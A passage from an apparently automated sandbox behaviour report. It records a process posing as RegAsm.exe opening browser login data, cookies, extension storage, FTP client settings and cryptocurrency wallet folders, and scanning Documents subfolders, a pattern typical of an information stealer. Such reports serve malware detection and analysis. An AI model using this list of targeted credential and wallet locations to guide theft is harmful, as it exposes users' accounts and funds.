            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QCFWYSKMHA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QCFWYSKMHA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NEBFQQYWPS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NEBFQQYWPS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NEBFQQYWPS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NEBFQQYWPS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QCFWYSKMHA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QCFWYSKMHA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\SFPUSAFIOL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\LSBIHQFDVT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QCFWYSKMHA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\QCFWYSKMHA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\IPKGELNTQY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
